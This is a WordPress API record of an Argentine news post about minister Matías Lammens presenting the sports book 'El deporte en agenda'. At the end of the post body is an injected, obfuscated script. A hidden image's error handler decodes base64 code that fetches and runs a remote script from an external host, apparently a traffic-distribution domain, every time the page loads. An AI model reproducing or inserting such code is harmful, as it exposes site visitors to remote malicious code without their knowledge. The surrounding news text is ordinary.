{"id":7264,"date":"2023-08-25T10:35:18","date_gmt":"2023-08-25T13:35:18","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7264"},"modified":"2025-08-13T15:54:58","modified_gmt":"2025-08-13T18:54:58","slug":"lammens-encabezo-la-presentacion-del-libro-el-deporte-en-agenda","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7264","title":{"rendered":"Lammens encabez\u00f3 la presentaci\u00f3n del libro \u00abEl deporte en agenda\u00bb"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>En el marco del Observatorio Social del Deporte<\/em><\/h3>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, particip\u00f3 de la presentaci\u00f3n del libro\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/observatorio-social-del-deporte\/libro-el-deporte-en-agenda\" target=\"_blank\" rel=\"noreferrer noopener\">\u00abEl deporte en agenda &#8211; Debates, ideas y encrucijadas del deporte argentino actual\u00bb<\/a>, que re\u00fane a deportistas, dirigentes, acad\u00e9micas\/os, entrenadores\/as, periodistas y escritoras\/es a reflexionar sobre la pr\u00e1ctica deportiva en nuestro pa\u00eds.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x405.jpg\" alt=\"\" class=\"wp-image-7186\" width=\"652\" height=\"258\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x405.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-300x119.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-768x303.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1536x607.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-2048x809.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-696x275.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1068x422.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1063x420.jpg 1063w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-320x126.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-480x190.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-800x316.jpg 800w\" sizes=\"(max-width: 652px) 100vw, 652px\" \/><\/a><figcaption class=\"wp-element-caption\">    <em><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad:<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>En ese marco, se\u00f1al\u00f3: \u00abEste libro va en el mismo camino que hemos transitado durante todos estos a\u00f1os: reunimos una cantidad de voces plurales para enriquecer el debate hacia la construcci\u00f3n de mejores pol\u00edticas p\u00fablicas. Eso redunda en m\u00e1s inversi\u00f3n en infraestructura deportiva, en m\u00e1s capacitaci\u00f3n para las personas trabajan vinculadas al deporte y sus instituciones y en seguir democratizando el acceso al deporte\u00bb.<\/p>\n\n\n\n<p>Tambi\u00e9n expusieron el director de Inclusi\u00f3n Social en el Deporte, Ignacio Mazzola; el subsecretario de Desarrollo Territorial de la Universidad Nacional de San Mart\u00edn, Jos\u00e9 Garriga; y Ver\u00f3nica Moreira, Juan Manuel Herbella, Rodrigo Daskal y Natalia Maderna como autores invitados.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"7265\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-1024x682.jpg\" alt=\"\" class=\"wp-image-7265\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-1024x682.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-1068x711.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368306089_609736514666690_9207232418480195805_n.jpg 1440w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"7266\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-1024x682.jpg\" alt=\"\" class=\"wp-image-7266\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-1024x682.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-1068x711.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368263041_609736641333344_8785097389152707416_n.jpg 1440w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"7267\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-1024x682.jpg\" alt=\"\" class=\"wp-image-7267\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-1024x682.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-1068x711.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/368804231_609736594666682_4210389698388895005_n.jpg 1440w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>\u201cEl deporte en agenda &#8211; Debates, ideas y encrucijadas del deporte argentino actual\u201d es un proyecto motorizado por el Observatorio Social del Deporte, una unidad de conocimiento conformada entre el Instituto de Altos Estudios Sociales (IDAES) de la Universidad Nacional de San Mart\u00edn (UNSAM) y el Ministerio de Turismo y Deportes de la Naci\u00f3n.<\/p>\n\n\n\n<p>El libro que discute una parte muy importante de la agenda del deporte contempor\u00e1neo: los clubes, las violencias, la profesionalizaci\u00f3n, las idolatr\u00edas, las nuevas tecnolog\u00edas, los g\u00e9neros y diversidades, la actividad dirigencial, las ciudades e infraestructuras, y otros fen\u00f3menos sociales, econ\u00f3micos, pol\u00edticos y culturales.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Descargas<\/h4>\n\n\n\n<p>\u00abEl deporte en agenda &#8211; Debates, ideas y encrucijadas del deporte argentino actual\u00bb&nbsp;<small>(6.78 MB)<\/small><\/p>\n\n\n\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link wp-element-button\" href=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/2023\/08\/deporte_en_agenda_-_digital_1.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">Descarga Archivos<\/a><\/div>\n<\/div>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Observatorio Social del Deporte El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, particip\u00f3 de la presentaci\u00f3n del libro\u00a0\u00abEl deporte en agenda &#8211; Debates, ideas y encrucijadas del deporte argentino actual\u00bb, que re\u00fane a deportistas, dirigentes, acad\u00e9micas\/os, entrenadores\/as, periodistas y escritoras\/es a reflexionar sobre la pr\u00e1ctica deportiva en nuestro [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7264","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7264","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7264"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7264\/revisions"}],"predecessor-version":[{"id":10326,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7264\/revisions\/10326"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7268"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7264"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7264"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7264"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}